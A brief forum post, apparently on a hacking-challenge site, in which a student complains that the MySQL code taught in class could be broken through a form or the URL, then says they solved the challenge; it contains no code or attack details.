The worst is that I’m supposed to be learning mysql shit at school and all we’ve been doing could literally be broken either from the form where there is one or directly from the url, no security what so ever and the teacher doesn’t seem to be concerned -_-

EDIT: yep, was too much, I solved it :3

2 replies have been removed
You must be logged in to reply to this discussion. Login
1 of 90

This site only uses cookies that are essential for the functionality of this website. Cookies are not used for tracking or marketing purposes.

By using our site, you acknowledge that you have read and understand our Privacy Policy, and Terms of Service.

Dismiss